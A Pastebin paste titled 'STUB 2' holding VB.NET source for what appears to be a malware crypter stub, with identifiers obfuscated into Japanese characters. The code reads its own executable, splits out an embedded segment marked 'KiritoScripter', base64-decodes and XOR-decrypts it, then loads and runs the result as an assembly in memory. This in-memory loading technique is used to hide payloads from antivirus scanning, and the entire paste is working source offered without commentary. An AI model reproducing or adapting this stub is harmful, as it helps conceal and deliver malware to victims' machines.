Advertisement
guvioli

STUB 2

Dec 9th, 2019
102
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.40 KB | None | 0 0
  1. Module のた任での
  2. Const たたつ任べ = "KiritoScripter"
  3. Dim てスすべべ() As String = Split(IO.File.ReadAllText(Reflection.Assembly.GetExecutingAssembly.Location), たたつ任べ)
  4. Dim はジ私はす As Byte()
  5. Public xorkeyy As String = てスすべべ(2)
  6. Sub Main()
  7. はジ私はす = Xor_Decrypt(Convert.FromBase64String((てスすべべ(1))))
  8. Dim つつのす愛 As Object = Reflection.Assembly.Load(はジ私はす).EntryPoint.Invoke(Nothing, Nothing)
  9. End Sub
  10. Public Function Xor_Decrypt(ByVal す私チべが As Byte()) As Byte()
  11. Dim チは愛のジ As Byte() = System.Text.Encoding.ASCII.GetBytes(xorkeyy)
  12. Dim べチべちす As Integer = す私チべが(す私チべが.Length - 1) Xor 112
  13. Dim スススのつ(す私チべが.Length) As Byte
  14. Dim つ愛ェのべ As Integer
  15. For のた任での0 As Integer = 0 To す私チべが.Length - 1
  16. スススのつ(のた任での0) = (す私チべが(のた任での0) Xor べチべちす) Xor チは愛のジ(つ愛ェのべ)
  17. If つ愛ェのべ = xorkeyy.Length - 1 Then つ愛ェのべ = 0 Else つ愛ェのべ = つ愛ェのべ + 1
  18. Next
  19. ReDim Preserve スススのつ(す私チべが.Length - 2)
  20. Return スススのつ
  21. End Function
  22. End Module
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement